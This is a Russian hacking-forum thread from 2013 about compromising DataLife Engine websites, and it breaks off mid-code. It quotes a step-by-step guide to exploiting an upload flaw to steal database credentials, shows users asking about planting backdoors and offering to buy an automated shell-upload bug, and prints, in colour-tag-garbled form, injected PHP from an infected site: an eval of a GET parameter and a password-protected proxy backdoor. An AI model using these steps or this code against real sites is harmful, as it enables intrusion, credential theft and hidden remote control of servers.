 |
|
27.04.2013, 13:21
|
|
Новичок
Регистрация: 24.04.2013
Сообщений: 1
С нами:
6869846
Репутация:
0
|
|
Сообщение от sanchez
Вроде бы еще не было так что извеняюсь если повторюсь!
Взлом сайта на DLE версии ниже 9.0, инструкция (Работаем через браузер Opera 10).
1. Заходим на сайт жертвы
2. Регистрируемся и авторизуемся на сайте
3. Переходим по ссылке _http://site.ru/engine/images.php (где site.ru - адрес жертвы)
4. Открываем исходный код открытой нами страницы и после:
(строка может немного отличаться и повторяться 2 раза, вставляем после 1й)
Нажимаем в браузере, под вкладками Применить изменения
5. После этих действий необходимо проверить работоспособность дырки, для этого на странице http://site.ru/engine/images.php, чей исходный код мы редактировали пунктом выше, нажимаем Загрузить. В списке загруженных файлов должен появиться dbconfig.php, мы можем продолжить...
Что бы скачать файл конфига мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:
[download]
[/HTML]
и скачиваем файл dbconfig.php с данными для входа в phpMyAdmin, адрес которой обычно site.ru/phpmyadmin/ или site.ru/myadmin/
ИсточникВсе проделываю, но при нажатии на кнопку загрузки, выдает сообщение "Невозможно создать директорию /uploads/posts/2013-04/".
Это можно как-то обойти? Или пока админ фотку на загрузит в этом месяце и в этом году - не получится?
|
|
|
04.05.2013, 22:00
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Есть админ акк, dle нулл с затертой версией, но это 9,6-9,7. Есть возможность залиться или оставить бекдор?)
|
|
|
|
04.05.2013, 23:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
Сообщение от justonline
Есть админ акк, dle нулл с затертой версией, но это 9,6-9,7. Есть возможность залиться или оставить бекдор?)
Есть, способ известен давно, работает под все версии.
Недавно его "переоткрыли" еще несколько человек, независимо друг от друга, но в паблик выкладывать пока не собираются.
Исходники открыты, можно поковырять самому, способ не сложный.
|
|
|
|
11.05.2013, 10:47
|
|
Новичок
Регистрация: 23.03.2007
Сообщений: 2
С нами:
10072412
Репутация:
7
|
|
Сообщение от vadim3553
Все проделываю, но при нажатии на кнопку загрузки, выдает сообщение "Невозможно создать директорию /uploads/posts/2013-04/".
Это можно как-то обойти? Или пока админ фотку на загрузит в этом месяце и в этом году - не получится?
Уязвимость не актуальна уже давным-давно. Все сайты с ней уже пофиксили. Версия в которую вы хотите залить - фикс. Можно даже не пытаться
|
|
|
|
03.06.2013, 00:31
|
|
Познающий
Регистрация: 28.07.2010
Сообщений: 91
С нами:
8311286
Репутация:
48
|
|
Сообщение от Scraid
Уязвимость не актуальна уже давным-давно. Все сайты с ней уже пофиксили. Версия в которую вы хотите залить - фикс. Можно даже не пытаться
хмм, а возможно ли автоматизировать эту уязвимость для заливки шеллов автоматически? Если да, то готов купить данный баг ...
|
|
|
|
03.06.2013, 19:21
|
|
Новичок
Регистрация: 10.01.2012
Сообщений: 0
С нами:
7546646
Репутация:
0
|
|
Здравствуйте, есть дле сайт, при заходе на главнуюю выводит такое
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]recourse[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]request[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sad[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tongue[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]wassat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]crying[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]what[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]bully[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]angry[/COLOR][COLOR="#DD0000"]", 'timestamp_active' => "[/COLOR][COLOR="#0000BB"]j F Y[/COLOR][COLOR="#DD0000"]", 'news_sort' => "[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#DD0000"]", 'news_msort' => "[/COLOR][COLOR="#0000BB"]DESC[/COLOR][COLOR="#DD0000"]", 'catalog_sort' => "[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#DD0000"]", 'catalog_msort' => "[/COLOR][COLOR="#0000BB"]DESC[/COLOR][COLOR="#DD0000"]", 'image_align' => "[/COLOR][COLOR="#0000BB"]left[/COLOR][COLOR="#DD0000"]", 'mail_news' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'show_sub_cats' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'short_rating' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'hide_full_link' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'allow_search_print' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_add_tags' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_site_wysiwyg' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'allow_quick_wysiwyg' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_comments' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'comments_maxlen' => "[/COLOR][COLOR="#0000BB"]3000[/COLOR][COLOR="#DD0000"]", 'comm_nummers' => "[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#DD0000"]", 'comm_msort' => "[/COLOR][COLOR="#0000BB"]ASC[/COLOR][COLOR="#DD0000"]", 'flood_time' => "[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#DD0000"]", 'auto_wrap' => "[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#DD0000"]", 'timestamp_comment' => "[/COLOR][COLOR="#0000BB"]j F Y H[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#DD0000"]", 'allow_search_link' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'mail_comments' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_comments_wysiwyg' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'full_search' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_registration' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'allow_cache' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'allow_multi_category' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'related_news' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'no_date' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_fixed' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'speedbar' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_banner' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_cmod' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_votes' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'allow_topnews' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'allow_read_count' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'cache_count' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_calendar' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'allow_archives' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'rss_informer' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_tags' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_change_sort' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'ajax' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'files_allow' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'files_type' => "[/COLOR][COLOR="#0000BB"]zip[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]rar[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]exe[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]doc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pdf[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]swf[/COLOR][COLOR="#DD0000"]", 'max_file_size' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'max_file_count' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'files_force' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'files_max_speed' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'files_antileech' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'files_count' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'admin_mail' => "[/COLOR][COLOR="#0000BB"]admin[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#DD0000"]", 'mail_metod' => "[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#DD0000"]", 'smtp_host' => "[/COLOR][COLOR="#0000BB"]localhost[/COLOR][COLOR="#DD0000"]", 'smtp_port' => "[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#DD0000"]", 'smtp_user' => "", 'smtp_pass' => "", 'mail_bcc' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'reg_group' => "[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#DD0000"]", 'registration_type' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'registration_rules' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_sec_code' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'allow_skin_change' => "[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#DD0000"]", 'mail_pm' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'max_users' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'max_users_day' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'max_up_side' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'max_up_size' => "[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#DD0000"]", 'max_image_days' => "[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#DD0000"]", 'allow_watermark' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'max_watermark' => "[/COLOR][COLOR="#0000BB"]150[/COLOR][COLOR="#DD0000"]", 'max_image' => "[/COLOR][COLOR="#0000BB"]450[/COLOR][COLOR="#DD0000"]", 'jpeg_quality' => "[/COLOR][COLOR="#0000BB"]85[/COLOR][COLOR="#DD0000"]", 'tag_img_width' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'flv_watermark' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_smartphone' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_smart_images' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_smart_video' => "[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#DD0000"]", 'allow_smart_format' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'allow_rss' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'rss_mtype' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'rss_number' => "[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#DD0000"]", 'rss_format' => "[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#DD0000"]", 'version_id' => "[/COLOR][COLOR="#0000BB"]8.0[/COLOR][COLOR="#DD0000"]", 'allow_upload' => "[/COLOR][COLOR="#0000BB"]yes[/COLOR][COLOR="#DD0000"]", 'news_captcha' => "[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]", 'lang_GlassyEvolution' => "[/COLOR][COLOR="#007700"]{${@eval([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]cmd[/COLOR][COLOR="#007700"]])}}[/COLOR][COLOR="#DD0000"]", if (isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'_rpx'])) { define('vpsp_version', '2.5.0'); define('vpsp_pwd', '12345678'); define('vpsp_enc_key', '12345678password'); error_reporting(~E_ALL); @set_time_limit(0); ob_implicit_flush(1); ignore_user_abort(0); header('Content-type: application/octet-stream'); header('Content-Transfer-Encoding: binary'); header('X-VPSP-VERSION: ' . vpsp_version);[/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"]= fopen('php://input', 'r'); define('vpsp_enc', ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) != 0);[/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]; if (vpsp_enc) { if (isset([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_pe']) == false) {[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_ks'] = VC_GenerateKeyHash(vpsp_enc_key);[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_pe'] = VC_Init(vpsp_enc_key,[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_ks']); }[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_pd'] = array_flip([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vpsp_pe']);[/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]= VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 2)); if ([/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]!= 'OK') { header('X-VPSP-ERROR: bad_enc_key'); header('X-VPSP-HOST: ' . (isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTPS']) ? 'https://' : 'http://') .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'] .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI']); exit; }[/COLOR][COLOR="#0000BB"]$rBuffLen[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$sBuffLen[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$reqPwd[/COLOR][COLOR="#DD0000"]= ([/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]> 0) ? VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"])) : '';[/COLOR][COLOR="#0000BB"]$https[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]= VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)))));[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#DD0000"]= ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))) * 256 + ord(VC_Decrypt(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1))); } else {[/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]= fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 2); if ([/COLOR][COLOR="#0000BB"]$ok[/COLOR][COLOR="#DD0000"]!= 'OK') { header('X-VPSP-ERROR: bad_request'); header('X-VPSP-HOST: ' . (isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTPS']) ? 'https://' : 'http://') .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'] .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI']); exit; }[/COLOR][COLOR="#0000BB"]$rBuffLen[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 * 256 * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1));[/COLOR][COLOR="#0000BB"]$sBuffLen[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 * 256 * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1));[/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1));[/COLOR][COLOR="#0000BB"]$reqPwd[/COLOR][COLOR="#DD0000"]= ([/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]> 0) ? fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$reqPwdLen[/COLOR][COLOR="#DD0000"]) : '';[/COLOR][COLOR="#0000BB"]$https[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1));[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]= fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)));[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#DD0000"]= ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)) * 256 + ord(fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"], 1)); } if ([/COLOR][COLOR="#0000BB"]$reqPwd[/COLOR][COLOR="#DD0000"]!== vpsp_pwd) {[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]= "[/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.0 401 Unauthorized[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VERSION[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . vpsp_version . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]bad_password[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]HOST[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . (isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTPS']) ? 'https://' : 'http://') .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'] .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'] . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nConnection[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]close[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]"; if (vpsp_enc) { echo VC_Encrypt([/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]); } else { echo[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]; } exit; } if ([/COLOR][COLOR="#0000BB"]$https[/COLOR][COLOR="#DD0000"]== 1) {[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]= 'ssl://' .[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]; }[/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]= fsockopen([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$errno[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$errstr[/COLOR][COLOR="#DD0000"], 20); if ([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"]== false) {[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]= "[/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.0 503 Service Unavailable[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VERSION[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . vpsp_version . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]host_down[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]TEXT[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . base64_encode([/COLOR][COLOR="#0000BB"]$errstr[/COLOR][COLOR="#DD0000"]) ."[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]HOST[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . (isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTPS']) ? 'https://' : 'http://') .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'] .[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'] . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nX[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]VPSP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]TARGET[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]" . str_replace('ssl://', '',[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]) . "[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]nConnection[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]close[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]"; if (vpsp_enc) { echo VC_Encrypt([/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]); } else { echo[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#DD0000"]; } exit; } while ([/COLOR][COLOR="#0000BB"]$wbuffer[/COLOR][COLOR="#DD0000"]= fread([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$rBuffLen[/COLOR][COLOR="#DD0000"])) { if (vpsp_enc) { fwrite([/COLOR][COLOR="#0000BB"]$fsok[/COLOR][COLOR="#DD0000"], VC_Decrypt([/COLOR][COLOR="#0000BB"]$wbuffer[/COLOR][COLOR="#DD0000"])); } else { 